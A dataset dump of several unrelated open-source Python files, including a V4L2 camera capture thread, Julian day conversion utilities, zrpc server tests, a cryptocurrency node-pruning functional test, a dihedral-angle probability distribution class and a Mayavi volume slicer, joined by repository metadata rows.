for device_new in devices:
try:
self._stream = v4l2capture.Video_device("/dev/"+device_new)
except IOError as err_new:
pass
else:
logging.warning("Device {default} was not available but {new} could be opened.".format(default=self._device_name, new=device_new))
self._device_name = device_new
return
raise err_pref
else:
return
def setupStream(self):
with self._conf_lock:
self._stream.set_format(self._conf["capture-res"][0], self._conf["capture-res"][1], fourcc='MJPG')
self._stream.create_buffers(1)
self._stream.queue_all_buffers()
def newConf(self):
self._new_conf.set()
def run(self):
self._stop.clear()
with self._conf_lock:
conf = self._conf.copy() # Create thread-safe local copy
sleep(float(conf["capture-warmup"])) # Camera warm-up wait
while True :
if self._stop.is_set():
break
if self._new_conf.is_set():
with self._conf_lock:
conf = self._conf.copy()
self._new_conf.clear()
logging.debug("New configuration set: {conf}".format(conf=conf))
if conf["capture"]:
if self._stream is None:
if self.tryOpenStream() is FAIL:
continue
try:
select.select((self._stream,), (), ())
raw = self._stream.read_and_queue()
except IOError as err_first:
self._stream.close()
self.tryOpenStream()
continue
if raw is None:
logging.warning("Grabbed frame is empty.")
while True:
try:
self._out_queue.put(cv2.imdecode(np.fromstring(raw, dtype=np.byte), flags=cv2.IMREAD_COLOR), block=False)
except Full:
self._out_queue.get()
else:
break
else:
sleep(1) # Reduce CPU consumption
if self._stream is not None:
self._stream.close()
logging.info("Thread stopped.")
def tryOpenStream(self):
try:
self.openStream()
except IOError as err:
with self._conf_lock:
self._conf["capture"] = False
self._conf["error"]["capture"] = True
self._stream = None
self.newConf()
logging.error("Capture disabled: could not open stream, no device available.")
return FAIL
else:
self.setupStream()
self._stream.start()
return (not FAIL)
def stop(self):
self._stop.set()
| bsd-3-clause | 8,370,857,560,826,415,000 | 31.088889 | 150 | 0.511311 | false |
mpercich/Calendarize | ios/dateparser/lib/python2.7/site-packages/convertdate/julianday.py | 1 | 1740 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of convertdate.
# http://github.com/fitnr/convertdate
# Licensed under the GPL-v3.0 license:
# http://opensource.org/licenses/MIT
# Copyright (c) 2016, fitnr <fitnr@fakeisthenewreal>
from datetime import datetime
from . import gregorian
from . import julian
from pytz import utc
def to_datetime(jdc):
'''Return a datetime for the input floating point Julian Day Count'''
year, month, day = gregorian.from_jd(jdc)
# in jdc: 0.0 = noon, 0.5 = midnight
# the 0.5 changes it to 0.0 = midnight, 0.5 = noon
frac = (jdc + 0.5) % 1
hours = int(24 * frac)
mfrac = frac * 24 - hours
mins = int(60 * round(mfrac, 6))
sfrac = mfrac * 60 - mins
secs = int(60 * round(sfrac, 6))
msfrac = sfrac * 60 - secs
# down to ms, which are 1/1000 of a second
ms = int(1000 * round(msfrac, 6))
return datetime(year, month, day, int(hours), int(mins), int(secs), int(ms), tzinfo=utc)
def from_datetime(dt):
# take account of offset (if there isn't one, act like it's utc)
try:
dt = dt + dt.utcoffset()
except TypeError:
# Assuming UTC
pass
jdc = gregorian.to_jd(dt.year, dt.month, dt.day)
hfrac = dt.hour / 24.
mfrac = round(dt.minute / (24. * 60), 5)
sfrac = round(dt.second / (24. * 60 * 60), 5)
msfrac = dt.microsecond / (24. * 60 * 60 * 1000)
return jdc + hfrac + mfrac + sfrac + msfrac
def to_gregorian(jdc):
return gregorian.from_jd(jdc)
def from_gregorian(year, month, day):
return gregorian.to_jd(year, month, day)
def to_julian(jdc):
return julian.from_jd(jdc)
def from_julian(year, month, day):
return julian.to_jd(year, month, day)
| mit | -8,246,665,454,322,578,000 | 23.166667 | 92 | 0.624713 | false |
ckan/datapusher | datapusher/main.py | 1 | 1147 | import os
import six
import ckanserviceprovider.web as web
from datapusher import jobs
# check whether jobs have been imported properly
assert(jobs.push_to_datastore)
def serve():
web.init()
web.app.run(web.app.config.get('HOST'), web.app.config.get('PORT'))
def serve_test():
web.init()
return web.app.test_client()
def main():
import argparse
argparser = argparse.ArgumentParser(
description='Service that allows automatic migration of data to the CKAN DataStore',
epilog='''"He reached out and pressed an invitingly large red button on a nearby panel.
The panel lit up with the words Please do not press this button again."''')
if six.PY3:
argparser.add_argument('config', metavar='CONFIG', type=argparse.FileType('r'),
help='configuration file')
if six.PY2:
argparser.add_argument('config', metavar='CONFIG', type=file,
help='configuration file')
args = argparser.parse_args()
os.environ['JOB_CONFIG'] = os.path.abspath(args.config.name)
serve()
if __name__ == '__main__':
main()
| agpl-3.0 | 794,481,854,645,896,600 | 27.675 | 95 | 0.644289 | false |
zacharyvoase/zrpc | tests/server_test.py | 1 | 4208 | from __future__ import with_statement
from contextlib import contextmanager
from Queue import Queue
import threading
from bson import BSON
from nose.tools import assert_equal
import zmq
from zrpc.concurrency import Callback
from zrpc.server import Server
from zrpc.registry import Registry
REGISTRY = Registry()
class Unserializable(object):
def __repr__(self):
return '<unserializable>'
@REGISTRY.method
def add(x, y):
return x + y
@REGISTRY.method
def raises_error():
raise Exception("some error occurred")
@REGISTRY.method
def returns_bson_unserializable_obj():
return Unserializable()
@contextmanager
def server(addr, registry, connect=False, context=None):
context = context or zmq.Context.instance()
# Set up a server, tell it to run in a separate thread, and pass in a
# callback so that we can wait for the server to be bound before connecting
# our client. This avoids an issue we were having with inproc:// transport,
# wherein if the client connected before the server had bound, it would
# raise an error.
callback = Callback()
server = Server(addr, registry, connect=connect, context=context)
server_thread = threading.Thread(
target=server.run,
kwargs=dict(callback=callback))
server_thread.daemon = True
server_thread.start()
server_socket = callback.wait()
try:
yield
finally:
context.term()
@contextmanager
def get_client(addr, context=None):
context = context or zmq.Context.instance()
client = context.socket(zmq.REQ)
client.connect(addr)
try:
yield client
finally:
client.close()
@contextmanager
def server_and_client(addr, registry, connect=False, context=None):
context = context or zmq.Context.instance()
with server(addr, registry, connect=connect, context=context):
with get_client(addr, context=context) as client:
yield client
def test_server_responds_correctly():
with server_and_client('inproc://zrpc', REGISTRY) as client:
client.send(BSON.encode({
"id": "abc",
"method": "add",
"params": [3, 4]}))
assert_equal(BSON(client.recv()).decode(),
{"id": "abc", "result": 7, "error": None})
def test_missing_method_returns_an_error():
with server_and_client('inproc://zrpc', REGISTRY) as client:
client.send(BSON.encode({
"id": "abc",
"method": "doesnotexist",
"params": [3, 4]}))
assert_equal(BSON(client.recv()).decode(),
{"id": "abc",
"result": None,
"error": {
"type": "zrpc.exceptions.MissingMethod",
"args": ["doesnotexist"],
"message": "MissingMethod: doesnotexist"
}})
def test_errors_raised_in_method_are_returned():
with server_and_client('inproc://zrpc', REGISTRY) as client:
client.send(BSON.encode({
"id": "abc",
"method": "raises_error",
"params": []}))
assert_equal(BSON(client.recv()).decode(),
{"id": "abc",
"result": None,
"error": {
"type": "exceptions.Exception",
"args": ["some error occurred"],
"message": "Exception: some error occurred"
}})
def test_bson_unserializable_objects_returned_raise_an_error():
with server_and_client('inproc://zrpc', REGISTRY) as client:
client.send(BSON.encode({
"id": "abc",
"method": "returns_bson_unserializable_obj",
"params": []}))
assert_equal(BSON(client.recv()).decode(),
{"id": "abc",
"result": None,
"error": {
"type": "bson.errors.InvalidDocument",
"args": ["Cannot encode object: <unserializable>"],
"message": "InvalidDocument: Cannot encode object: <unserializable>"
}})
| unlicense | -380,070,639,397,219,400 | 29.492754 | 94 | 0.568679 | false |
biblepay/biblepay | test/functional/node_network_limited.py | 1 | 5097 | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests NODE_NETWORK_LIMITED.
Tests that a node configured with -prune=550 signals NODE_NETWORK_LIMITED correctly
and that it responds to getdata requests for blocks correctly:
- send a block within 288 + 2 of the tip
- disconnect peers who request blocks older than that."""
from test_framework.messages import CInv, msg_getdata, NODE_BLOOM, NODE_NETWORK_LIMITED, msg_verack
from test_framework.mininode import NetworkThread, P2PInterface, wait_until, mininode_lock, network_thread_start, network_thread_join
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, disconnect_nodes, connect_nodes_bi, sync_blocks
import sys
class P2PIgnoreInv(P2PInterface):
firstAddrnServices = 0
def on_inv(self, message):
# The node will send us invs for other blocks. Ignore them.
pass
def on_addr(self, message):
self.firstAddrnServices = message.addrs[0].nServices
def wait_for_addr(self, timeout=5):
test_function = lambda: self.last_message.get("addr")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def send_getdata_for_block(self, blockhash):
getdata_request = msg_getdata()
getdata_request.inv.append(CInv(2, int(blockhash, 16)))
self.send_message(getdata_request)
class NodeNetworkLimitedTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.stderr = sys.stdout
self.extra_args = [['-prune=550', '-txindex=0', '-addrmantest'], [], []]
def disconnect_all(self):
disconnect_nodes(self.nodes[0], 1)
disconnect_nodes(self.nodes[1], 0)
disconnect_nodes(self.nodes[2], 1)
disconnect_nodes(self.nodes[2], 0)
disconnect_nodes(self.nodes[0], 2)
disconnect_nodes(self.nodes[1], 2)
def setup_network(self):
super(NodeNetworkLimitedTest, self).setup_network()
self.disconnect_all()
def run_test(self):
node = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
network_thread_start()
node.wait_for_verack()
expected_services = NODE_BLOOM | NODE_NETWORK_LIMITED
self.log.info("Check that node has signalled expected services.")
assert_equal(node.nServices, expected_services)
self.log.info("Check that the localservices is as expected.")
assert_equal(int(self.nodes[0].getnetworkinfo()['localservices'], 16), expected_services)
self.log.info("Mine enough blocks to reach the NODE_NETWORK_LIMITED range.")
connect_nodes_bi(self.nodes, 0, 1)
blocks = self.nodes[1].generate(292)
sync_blocks([self.nodes[0], self.nodes[1]])
self.log.info("Make sure we can max retrive block at tip-288.")
node.send_getdata_for_block(blocks[1]) # last block in valid range
node.wait_for_block(int(blocks[1], 16), timeout=3)
self.log.info("Requesting block at height 2 (tip-289) must fail (ignored).")
node.send_getdata_for_block(blocks[0]) # first block outside of the 288+2 limit
node.wait_for_disconnect(5)
self.log.info("Check local address relay, do a fresh connection.")
self.nodes[0].disconnect_p2ps()
network_thread_join()
node1 = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
network_thread_start()
node1.wait_for_verack()
node1.send_message(msg_verack())
node1.wait_for_addr()
#must relay address with NODE_NETWORK_LIMITED
assert_equal(node1.firstAddrnServices, 1028) # Not 1036 like bitcoin, because NODE_WITNESS = 1 << 3 = 8
self.nodes[0].disconnect_p2ps()
node1.wait_for_disconnect()
# connect unsynced node 2 with pruned NODE_NETWORK_LIMITED peer
# because node 2 is in IBD and node 0 is a NODE_NETWORK_LIMITED peer, sync must not be possible
connect_nodes_bi(self.nodes, 0, 2)
try:
sync_blocks([self.nodes[0], self.nodes[2]], timeout=5)
except:
pass
# node2 must remain at heigh 0
assert_equal(self.nodes[2].getblockheader(self.nodes[2].getbestblockhash())['height'], 0)
# now connect also to node 1 (non pruned)
connect_nodes_bi(self.nodes, 1, 2)
# sync must be possible
sync_blocks(self.nodes)
# disconnect all peers
self.disconnect_all()
# mine 10 blocks on node 0 (pruned node)
self.nodes[0].generate(10)
# connect node1 (non pruned) with node0 (pruned) and check if the can sync
connect_nodes_bi(self.nodes, 0, 1)
# sync must be possible, node 1 is no longer in IBD and should therefore connect to node 0 (NODE_NETWORK_LIMITED)
sync_blocks([self.nodes[0], self.nodes[1]])
if __name__ == '__main__':
NodeNetworkLimitedTest().main()
| mit | 9,119,730,293,349,596,000 | 40.778689 | 134 | 0.665686 | false |
KarlTDebiec/Ramaplot | PDistDataset.py | 1 | 20943 | # -*- coding: utf-8 -*-
# ramaplot.PDistDataset.py
#
# Copyright (C) 2015 Karl T Debiec
# All rights reserved.
#
# This software may be modified and distributed under the terms of the
# BSD license. See the LICENSE file for details.
"""
Manages probability distribution datasets.
"""
################################### MODULES ###################################
from __future__ import absolute_import,division,print_function,unicode_literals
from .myplotspec.Dataset import Dataset
################################### CLASSES ###################################
class PDistDataset(Dataset):
"""
Manages probability distribution datasets.
Generates probability distribution from series of Φ/Ψ values,
representing either the probability of Φ/Ψ, or the expectation value
of a selected measurement (e.g. energy) at that Φ/Ψ.
Input data should be providied in a whitespace-delimited text file
including columns for Φ, Ψ, and any additional data, such as this
output from `cpptraj`'s `multidihedral` command::
#Frame phi:2 psi:2 chip:2 ...
1 -62.1431 144.6768 72.2964 ...
2 -63.2487 151.6551 71.9101 ...
... ... ... ...
"""
@classmethod
def get_cache_key(cls, infile, phikey="phi", psikey="psi",
zkey="free energy", mode="hist", bins=72, bandwidth=5, wrap=True,
mask_cutoff=None,
calc_populations=False, plot_populations=False,
*args, **kwargs):
"""
Generates tuple of arguments to be used as key for dataset
cache.
Arguments documented under :func:`__init__`.
"""
from os.path import expandvars
if zkey in ["free energy", "probability"]:
x_bins, y_bins = cls.process_bins_arg(bins, dim=2)
bins = (tuple(x_bins), tuple(y_bins))
else:
x_bins, y_bins, z_bins = cls.process_bins_arg(bins, dim=3)
bins = (tuple(x_bins), tuple(y_bins), tuple(z_bins))
if mode == "hist":
return (cls, expandvars(infile), phikey, psikey, zkey, mode, bins,
wrap, mask_cutoff, calc_populations, plot_populations)
elif mode == "kde":
return (cls, expandvars(infile), phikey, psikey, zkey, mode, bins,
bandwidth, wrap, mask_cutoff, calc_populations,
plot_populations)
@staticmethod
def process_bins_arg(bins, dim=2):
"""
Processes bin argument.
Arguments:
bins (int, list, ndarray): Bins to use for histogram or grid
to use for kernel density estimate; if int, number of bins
or gride points between -180° and 180° in Φ and Ψ, if list
or ndarray, bins or grid directly
Returns:
out_bins (tuple): Processed bins
"""
import numpy as np
if dim == 2:
if isinstance(bins, int):
x_bins = y_bins = np.linspace(-180, 180, bins + 1)
elif isinstance(bins, list):
if len(bins) == 2:
if isinstance(bins[0], int):
x_bins = np.linspace(-180, 180, bins[0] + 1)
elif isinstance(bins[0], list):
x_bins = np.array(bins[0])
if isinstance(bins[1], int):
y_bins = np.linspace(-180, 180, bins[1] + 1)
elif isinstance(bins[1], list):
y_bins = np.array(bins[1])
else:
x_bins = y_bins = np.array(bins)
elif isinstance(bins, np.ndarray):
x_bins = y_bins = bins
return x_bins, y_bins
elif dim == 3:
if isinstance(bins, int):
x_bins = y_bins = z_bins = np.linspace(-180, 180, bins + 1)
elif isinstance(bins, list):
if len(bins) == 2:
if isinstance(bins[0], int):
x_bins = y_bins = np.linspace(-180, 180, bins[0] + 1)
elif (isinstance(bins[0], list)
or isinstance(bins[0], np.ndarray)):
x_bins = y_bins = np.array(bins[0])
if isinstance(bins[1], int):
z_bins = np.linspace(-180, 180, bins[1] + 1)
elif (isinstance(bins[1], list)
or isinstance(bins[1], np.ndarray)):
z_bins = np.array(bins[1])
elif len(bins) == 3:
if isinstance(bins[0], int):
x_bins = np.linspace(-180, 180, bins[0] + 1)
elif (isinstance(bins[0], list)
or isinstance(bins[0], np.ndarray)):
x_bins = np.array(bins[0])
if isinstance(bins[1], int):
y_bins = np.linspace(-180, 180, bins[1] + 1)
elif (isinstance(bins[1], list)
or isinstance(bins[1], np.ndarray)):
y_bins = np.array(bins[1])
if isinstance(bins[2], int):
z_bins = np.linspace(-180, 180, bins[2] + 1)
elif (isinstance(bins[2], list)
or isinstance(bins[2], np.ndarray)):
z_bins = np.array(bins[2])
else:
x_bins = y_bins = z_bins = np.array(bins)
elif isinstance(bins, np.ndarray):
x_bins = y_bins = z_bins = bins
return x_bins, y_bins, z_bins
else:
raise TypeError()
def __init__(self, phikey="phi", psikey="psi", zkey="free energy",
mode="hist", bins=72, bandwidth=5, wrap=True, mask_cutoff=None,
calc_populations=False, plot_populations=False,
verbose=1, debug=0, **kwargs):
"""
Arguments:
infile (str): Path to text input file, may contain environment
variables
phikey (str): Key from which to load Φ
psikey (str): Key from which to load Ψ
zkey (str): Key from which to load distribution; if 'free
energy' or 'probability', the 2D probability density of Φ
and Ψ will be calculated and the selected representation
returned; for other values a third dimension will be loaded
from the `zkey` column of `infile`, the 3D probability
density of Φ, Ψ, and `zkey` will be calculated, and the
expectation value of `zkey` as a function of Φ and Ψ will be
returned
mode (str): Method of calculating probability distribution;
may be either 'hist', to use a histogram, or 'kde', to use a
kernel density estimate
bins (int, list, ndarray): Bins to use for histogram or grid
to use for kernel density estimate; if int, number of bins
or gride points between -180° and 180° in Φ and Ψ, if list
or ndarray, bins or grid directly
bandwidth (float, optional): Bandwidth to use for kernel
density estimate
wrap (bool): Wrap x and y coordinates between 180° and 360° to
between -180° and 0°
wrap_z (bool): Wrap z coordinates between -180° and 0 to between 180°
and 360°; probably only useful for plotting ω
mask_cutoff (float): Cutoff beyond which distribution is
masked, if `zkey` is 'free energy', this is a the maximum
free energy above which the mask will be set, and if `zkey`
is 'probability', this is the minimum probability below
which the mask will be set
hist_kw: Keyword arguments passed to numpy.histogram2d or
numpy.histogramdd
kde_kw: Keyword arguments passed to
sklearn.neighbors.KernelDensity
verbose (int): Level of verbose output
debug (int): Level of debug output
kwargs (dict): Additional keyword arguments
.. todo:
- Fix and validate 3D KDE
- Auto-detect phikey and psikey
- Support periodicic kernel density estimate
- Support variable bandwidth kernel density estimate
"""
import numpy as np
import pandas as pd
from .myplotspec import multi_get_copy
# Manage arguments
if str(mode.lower()) not in ["hist", "kde", "none"]:
raise ValueError("Argument 'mode' does not support provided " +
"value '{0}', may be 'hist', 'kde', or 'none'".format(mode))
read_csv_kw = dict(delim_whitespace=True, index_col=0)
read_csv_kw.update(kwargs.pop("read_csv_kw", {}))
# Load data
dataframe = self.load_dataset(verbose=verbose, debug=debug,
read_csv_kw=read_csv_kw, **kwargs).dataframe
if wrap:
dataframe[phikey][dataframe[phikey] > 180] -= 360
dataframe[psikey][dataframe[psikey] > 180] -= 360
# Option 0: Store Φ, Ψ
if mode == "none":
# Store data in instance variable
self.x = dataframe[phikey]
self.y = dataframe[psikey]
# Option 1: Calculate probability and free energy of Φ, Ψ
elif zkey in ["free energy", "probability"]:
x_bins, y_bins = self.process_bins_arg(bins, dim=2)
x_centers = (x_bins[:-1] + x_bins[1:]) / 2
y_centers = (y_bins[:-1] + y_bins[1:]) / 2
x_width = np.mean(x_centers[1:] - x_centers[:-1])
y_width = np.mean(y_centers[1:] - y_centers[:-1])
# Option 1a: Use a histogram (fast but noisy)
if mode == "hist":
if verbose >= 1:
print("calculating probability distribution of " +
"'{0}' and '{1}' using a ".format(phikey, psikey) +
"histogram")
hist_kw = dict(normed=False)
hist_kw.update(kwargs.get("hist_kw", {}))
hist_kw["bins"] = hist_kw.get("bins", [x_bins, y_bins])
probability, _, _ = np.histogram2d(
dataframe[phikey], dataframe[psikey], **hist_kw)
# Option 1b: Use a kernel density estimate (smooth but slow)
elif mode == "kde":
if verbose >= 1:
print("calculating probability distribution of " +
"'{0}' and '{1}' using a ".format(phikey, psikey) +
"kernel density estimate")
from sklearn.neighbors import KernelDensity
kde_kw = multi_get_copy("kde_kw", kwargs, {})
kde_kw["bandwidth"] = kde_kw.get("bandwidth", bandwidth)
xg, yg = np.meshgrid(x_centers, y_centers)
xyg = np.vstack([yg.ravel(), xg.ravel()]).T
samples = np.column_stack((dataframe[phikey],
dataframe[psikey]))
kde = KernelDensity(**kde_kw)
kde.fit(samples)
probability_series = np.exp(kde.score_samples(xyg))
probability = np.zeros((x_centers.size, y_centers.size))
for phi, psi, p in np.column_stack((xyg, probability_series)):
x_index = np.where(x_centers == phi)[0][0]
y_index = np.where(y_centers == psi)[0][0]
probability[x_index, y_index] = p
# Normalize and calculate free energy
probability /= np.nansum(probability)
free_energy = -1 * np.log(probability)
free_energy[np.isinf(free_energy)] = np.nan
free_energy -= np.nanmin(free_energy)
# Store data in instance variable
self.x_centers = x_centers
self.y_centers = y_centers
self.x_width = x_width
self.y_width = y_width
self.x_bins = x_bins
self.y_bins = y_bins
self.x = dataframe[phikey]
self.y = dataframe[psikey]
# Option 2: Calculate mean value of a third observable as a
# function of Φ, Ψ
else:
x_bins, y_bins, z_bins = self.process_bins_arg(bins, dim=3)
x_centers = (x_bins[:-1] + x_bins[1:]) / 2
y_centers = (y_bins[:-1] + y_bins[1:]) / 2
z_centers = (z_bins[:-1] + z_bins[1:]) / 2
x_width = np.mean(x_centers[1:] - x_centers[:-1])
y_width = np.mean(y_centers[1:] - y_centers[:-1])
if kwargs.get("wrap_z"):
dataframe[zkey][dataframe[zkey] < 0] += 360
# Option 2a: Use a histogram (fast but noisy)
if mode == "hist":
if verbose >= 1:
print("calculating mean value of '{0}'".format(zkey) +
"as a function of '{0}' and ".format(phikey) +
"'{0}' using a histogram".format(psikey))
hist_kw = dict(normed=True)
hist_kw.update(kwargs.get("hist_kw", {}))
hist_kw["bins"] = hist_kw.get("bins", [x_bins, y_bins, z_bins])
prob_xyz, _ = np.histogramdd(np.column_stack(
(dataframe[phikey], dataframe[psikey], dataframe[zkey])),
**hist_kw)
probability = np.sum(prob_xyz, axis=2)
prob_z_given_xy = prob_xyz / probability[:,:,np.newaxis]
weighted_z = prob_z_given_xy*z_centers[np.newaxis,np.newaxis,:]
mean_z = np.sum(weighted_z, axis=2)
# Option 2b: Use a kernel density estimate (smooth but slow)
elif mode == "kde":
raise()
from copy import copy
from sklearn.neighbors import KernelDensity
kde_kw = multi_get_copy("kde_kw", kwargs, {})
kde_kw["bandwidth"] = kde_kw.get("bandwidth", bandwidth)
# Only a single bandwidth is supported; scale z
# dimension to span range of 120-240
# scale_range = 340
z = copy(dataframe[zkey])
# z -= z.min() # shift bottom to 0
# z_range = z.max() # save max
# z *= (scale_range / z_range)
# z += (360 - scale_range) / 2 # Give buffer on top and bottom
xg, yg, zg = np.meshgrid(x_centers, y_centers, z_centers)
xyzg = np.vstack([xg.ravel(), yg.ravel(), zg.ravel()]).T
samples = np.column_stack((dataframe[phikey],
dataframe[psikey], z))
kde = KernelDensity(**kde_kw)
kde.fit(samples)
probability_series = np.exp(kde.score_samples(xyzg))
prob_xyz = np.zeros((x_centers.size, y_centers.size,
z_centers.size), np.float) * np.nan
for phi,psi,z,p in np.column_stack((xyzg, probability_series)):
x_index = np.where(x_centers == phi)[0][0]
y_index = np.where(y_centers == psi)[0][0]
z_index = np.where(z_centers == z)[0][0]
prob_xyz[x_index, y_index, z_index] = p
prob_xyz /= np.sum(prob_xyz)
probability = np.sum(prob_xyz, axis=2)
prob_z_given_xy = prob_xyz / probability[:,:,np.newaxis]
weighted_z = prob_z_given_xy*z_centers[np.newaxis,np.newaxis,:]
mean_z = np.sum(weighted_z, axis=2)
# mean_z -= (360 - scale_range) / 2 # Shift back down
# mean_z *= (z_range / scale_range) # Back from degrees to E
# free_energy *= 627.503 # Convert to kcal/mol
# Normalize and calculate free energy
probability /= np.nansum(probability)
free_energy = -1 * np.log(probability)
free_energy[np.isinf(free_energy)] = np.nan
free_energy -= np.nanmin(free_energy)
# Store data in instance variable
self.x_centers = x_centers
self.y_centers = y_centers
self.x_width = x_width
self.y_width = y_width
self.x_bins = x_bins
self.y_bins = y_bins
self.x = dataframe[phikey]
self.y = dataframe[psikey]
# Prepare mask
if mode == "none":
pass
elif zkey == "probability":
self.dist = probability
if mask_cutoff is not None:
self.mask = np.ma.masked_where(np.logical_and(
probability >= mask_cutoff,
np.logical_not(np.isnan(probability))),
np.ones_like(probability))
else:
self.mask = np.ma.masked_where(
np.logical_not(np.isnan(free_energy)),
np.ones_like(free_energy))
elif zkey == "free energy":
self.dist = free_energy
if mask_cutoff is not None:
self.mask = np.ma.masked_where(np.logical_and(
free_energy <= mask_cutoff,
np.logical_not(np.isnan(free_energy))),
np.ones_like(free_energy))
else:
self.mask = np.ma.masked_where(
np.logical_not(np.isnan(free_energy)),
np.ones_like(free_energy))
else:
self.dist = mean_z
if mask_cutoff is not None:
self.mask = np.ma.masked_where(np.logical_and(
free_energy <= mask_cutoff,
np.logical_not(np.isnan(free_energy))),
np.ones_like(free_energy))
else:
self.mask = np.ma.masked_where(
np.logical_not(np.isnan(free_energy)),
np.ones_like(free_energy))
# Calculate state populations
if calc_populations:
states = kwargs.get("states", [
("β", -151, 151),
("PPII", -66, 140),
("ξ", -145, 55),
("γ'", -81, 65),
("α", -70, -25),
("$L_α$", 55, 45),
("γ", 73, -35),
("PPII'", 56, -124),
("plateau", -100, -130)])
state_radius = kwargs.get("state_radius", 45)
distances = np.zeros((len(states), len(x_centers), len(y_centers)))
xs = []
ys = []
for i, (state, x, y) in enumerate(states):
xs += [x]
ys += [y]
# There must be a better way to do this, but this works
for j, xc in enumerate(x_centers):
for k, yc in enumerate(y_centers):
dx = (xc - x)
if dx <= -180 or dx >= 180:
dx = 360 - dx
else:
dx = dx
dy = (yc - y)
if dy <= -180 or dy >= 180:
dy = 360 - dy
else:
dy = dy
distances[i,j,k] = np.sqrt(dx**2 + dy**2)
assignments = np.argmin(distances, axis=0)
assignments[np.min(distances, axis=0) >= state_radius] = \
len(states) + 1
index, state_populations = [], []
for i, (state, x, y) in enumerate(states):
index += [state]
state_populations += [(x, y,
np.nansum(probability[assignments==i]))]
state_populations = pd.DataFrame(state_populations, index=index,
columns=["Φ center", "Ψ center", "population"])
self.state_populations = state_populations
if verbose >= 1:
print(state_populations)
if plot_populations:
self.dist = assignments
self.mask = np.ma.masked_where(
np.logical_not(assignments == len(states) + 1),
np.ones_like(assignments))
self.x = np.array(xs)
self.y = np.array(ys)
label, label_kw = [], []
from .myplotspec import multi_get_copy
default_label_kw = multi_get_copy(["default_label_kw",
"label_kw"], kwargs, {})
for index, row in state_populations.iterrows():
label += ["{0}\n{1:2d}%".format(index,
int(row["population"]*100))]
label_kw += [default_label_kw.copy()]
label_kw[-1]["x"] = row["Φ center"]
label_kw[-1]["y"] = row["Ψ center"]
self.label = label
self.label_kw = label_kw
| bsd-3-clause | 1,198,580,034,747,305,000 | 43.743041 | 80 | 0.494664 | false |
mattcieslak/DSI2 | dsi2/ui/volume_slicer.py | 1 | 10860 | #!/usr/bin/env python
import numpy as np
import nibabel as nib
# Traits stuff
from traits.api import ( HasTraits, Instance, Array,
Bool, Dict, on_trait_change, Range, Color, Any, Int,
DelegatesTo, CInt, Property, File )
from traitsui.api import View, Item, VGroup, \
HGroup, Group, RangeEditor, ColorEditor, VSplit
from mayavi import mlab
from mayavi.core.api import PipelineBase, Source
from mayavi.core.ui.api import SceneEditor
from mayavi.tools.mlab_scene_model import MlabSceneModel
from tvtk.pyface.scene import Scene
from tvtk.api import tvtk
from chaco.chaco_plot_editor import ChacoPlotItem
from chaco.api import Plot, ArrayPlotData, gray
from enable.component_editor import ComponentEditor
from ..streamlines.track_math import sphere_around_ijk
from ..volumes.scalar_volume import ScalarVolume
from .chaco_slice import Slices
import os
from ..volumes import get_MNI152
class SlicerPanel(HasTraits):
# path to a nifti file that holds the data
reference_volume = File
scene3d_inited = Bool(False)
# MNI_152 objects. data holds the np array, data_src is for mayavi
data = Array(value=np.zeros((50,50,50)))
data_src = Instance(Source)
# --- Sphere configuration ---
# position of the cursor
# Radius of the sphere
radius = Range(low=0,high=14,value=1)
extent_x = Int(50)
extent_y = Int(50)
extent_z = Int(50)
sphere_x = Range(low=0, high='extent_x')
sphere_y = Range(low=0, high='extent_y')
sphere_z = Range(low=0, high='extent_z')
sphere_coords = Array
sphere_color = Color((255,0,0,255))
sphere_visible = Bool(True)
coordsupdated = Int(0)
# Spere's representation on the screen
sphere_viz = Instance(PipelineBase)
widgets_drawn = Bool(False)
x_slice_plane = Instance(PipelineBase)
y_slice_plane = Instance(PipelineBase)
z_slice_plane = Instance(PipelineBase)
# Slice plots
slice_plots = Instance(Slices)
x = DelegatesTo('slice_plots')
y = DelegatesTo('slice_plots')
z = DelegatesTo('slice_plots')
# 3d image plane widget
scene3d = Instance(MlabSceneModel, ())
camera_initialized = False
def __init__(self, **traits):
""" Creates a panel for viewing a 3d Volume.
Parameters:
===========
"""
super(SlicerPanel,self).__init__(**traits)
self.sphere_coords
self.scene3d
self.sphere_viz
@on_trait_change("reference_volume")
def render_volume(self):
if not os.path.exists(self.reference_volume):
print "No such file", self.reference_volume
return
print "Opening", self.reference_volume
try:
data = nib.load(self.reference_volume)
except Exception, e:
print "Unable to load data", e
return
# Remove imageplane widgets
self.scene3d.disable_render = True
if self.widgets_drawn:
self.x_slice_plane.remove()
self.y_slice_plane.remove()
self.z_slice_plane.remove()
# Set data and update the data_src
self.data = data.get_data()
# Change the extents to match the new volume
self.extent_x, self.extent_y, self.extent_z = self.data.shape
# Send to mayavi
self.data_src = mlab.pipeline.scalar_field(self.data,
figure=self.scene3d.mayavi_scene,
name='Data',colormap="gray")
# Send the new data to the slices
self.slice_plots.set_volume(self.data)
# Update the sphere to be in the middle of this volume
self.sphere_x = self.extent_x / 2
self.sphere_y = self.extent_y / 2
self.sphere_z = self.extent_z / 2
self.x_slice_plane = self.make_x_slice_plane()
self.x_slice_plane.ipw.sync_trait(
"slice_position", self, alias="x")
self.x_slice_plane.ipw.sync_trait(
"enabled", self.slice_plots, alias="x_slice_plane_visible")
self.y_slice_plane = self.make_y_slice_plane()
self.y_slice_plane.ipw.sync_trait(
"slice_position", self, alias="y")
self.y_slice_plane.ipw.sync_trait(
"enabled", self.slice_plots, alias="y_slice_plane_visible")
self.z_slice_plane = self.make_z_slice_plane()
self.z_slice_plane.ipw.sync_trait(
"slice_position", self, alias="z")
self.z_slice_plane.ipw.sync_trait(
"enabled", self.slice_plots, alias="z_slice_plane_visible")
self.scene3d.disable_render = False
self.widgets_drawn = True
def _slice_plots_default(self):
return Slices()
def _sphere_viz_default(self):
# different between wx and qt
try:
color_tuple = self.sphere_color.toTuple()
except:
color_tuple = self.sphere_color
try:
pts = mlab.points3d(
self.sphere_coords[:,0],
self.sphere_coords[:,1],
self.sphere_coords[:,2],
mode='cube',
scale_factor=1,
figure = self.scene3d.mayavi_scene,
color = (color_tuple[0]/255.,
color_tuple[1]/255.,
